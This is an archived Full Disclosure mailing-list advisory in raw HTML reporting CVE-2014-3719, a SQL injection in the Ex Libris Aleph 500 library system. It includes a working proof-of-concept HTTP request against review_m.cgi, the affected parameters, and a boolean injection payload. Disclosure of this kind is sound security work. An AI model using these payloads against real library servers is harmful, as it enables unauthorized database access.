[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] CVE-2014-3719 SQL Injection Vulnerability
- To: "fulldisclosure"<fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CVE-2014-3719 SQL Injection Vulnerability
- From: "shady.liu"<shady.liu@xxxxxxxxxxxxxxxxxxxx>
- Date: Thu, 15 May 2014 19:54:18 +0800
<div style="font:14px/1.5 'Lucida Grande', '微软雅黑';color:#333;"><p
class="ordinary-output target-output"><br></p><p style="margin: 0px;
line-height: normal; font-family: 'Lucida Grande'; color: rgb(50, 51, 51);
min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(50, 51, 51); min-height: 16px;"><br></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(50, 51, 51); min-height: 16px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; font-size: 12px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(50, 51, 51); min-height: 15px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida
Grande';">Greetings:</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);"> I found on a ALEPH500
(Integrated library management system) SQL Injection Vulnerability<span
style="font-family: 'Heiti SC Light';">;</span>CVE-ID is CVE-2014-3719.</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Aleph 500, fully meet the industry
standard, is an art
class perfect librarysolution, the Ex Libris to pursue
the essence of philosophy is flexible and easy to
use. Ex Libris is the world leader in the field of
Library and information center of development of high
performance application system.Aleph 500, with Oracle database as
a background, fully support the Unicodecharacter set, support
XML management report, and links to other top
application system of API, is a pioneer in the field of Library
automation.With more than 20 years of development experience, through
the design of the four generation Aleph system, Ex Libris
is already in the world won a number of loyal
customers, at present, there are already more than 1250sets of
Aleph system was installed in 51 countries and regions of
the libraryand Museum within the coalition.</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Software Description</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">=====================</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">The Aleph 500 system is a set of functional
integrity of the integrated library automation
system, is Israel's Ex Libris (Eli Beth Co.) developed
the fifth generation of products.</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Vulnerability Description</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">=========================</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Vulnerability title: <span style="color:
#000000">Multiple Persistent </span>) SQL Injection<span style="color:
#000000"> </span>ALEPH 500 (CVE-2014-3719)</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">CVE: CVE-2014-3719</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Vendor: Israeli Ex Libris (Eli Beth Co.)
development</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Product: Israeli Ex Libris (Eli Beth Co.)
development ALEPH500 (Integrated library management system)</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Affected version: 18.1<span style="font-family: 'Heiti
SC Light';">、</span> 20</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Fixed version: ALEPH 500</p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(50, 51, 51);"><span style="font-size:
14px;">Author: </span>Shady.Liu DBAppSecurity Co.Ltd.</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">URL:
http://[domain]/cgi-bin/review_m.cgi?docnum=000421742&getreview=1&lib=BGD01'/**/AND/**/'000Andz'%3d'000</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Andz</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Affected parameter(s): find<span style="font-family:
'Heiti SC Light';">、</span>lib<span style="font-family: 'Heiti SC
Light';">、</span>sid</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">HTTP REQUEST</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);"><span style="font-size: 10px;"> </span>GET</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51,
51);">/cgi-bin/review_m.cgi?docnum=000421742&getreview=1&lib=BGD01'/**/AND/**/'000Andz'%3d'000</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Andz HTTP/1.1</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">X-Requested-With: XMLHttpRequest</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Referer:</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(19, 109, 186);"><a
href="http://host:8991/F?func=find-m&find_code=WTI&FIND_BASE=BGD09&FIND_BASE=B";>http://host:8991/F?func=find-m&find_code=WTI&FIND_BASE=BGD09&FIND_BASE=B</a></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51,
51);">GD01&FIND_BASE=BGD03&FIND_BASE=BGD07&request=</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Host: host:8991</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Connection: Keep-alive</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Accept-Encoding: gzip,deflate</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Replace “find<span style="font-family: 'Heiti SC
Light';">、</span>lib<span style="font-family: 'Heiti SC Light';">、</span>sid"
parameter value with “' AND 6012=6012 AND 'SM'='SM”</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51);">Tools used: Mozilla Firefox browser</p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; line-height: normal; font-family: 'Lucida Grande';
color: rgb(50, 51, 51); min-height: 17px;"><br></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(50, 51, 51);">Shady.Liu DBAppSecurity
Co.Ltd.</p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(50, 51,
51);">-------------------------------------------------------------------------</p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(50, 51, 51); min-height: 16px;"><br></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(19, 109, 186);"><span style="color:
#323333">Email:<a href="mailto:Shady.liu@xxxxxxxxxxxxxxxxxxxx";><span
style="color: #136dba">Shady.liu@xxxxxxxxxxxxxxxxxxxx</span></a></span></p>
<p style="margin: 0px; font-size: 13px; line-height: normal; font-family:
'Lucida Grande'; color: rgb(50, 51,
51);">----------------------------------------------------------</p></div>
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/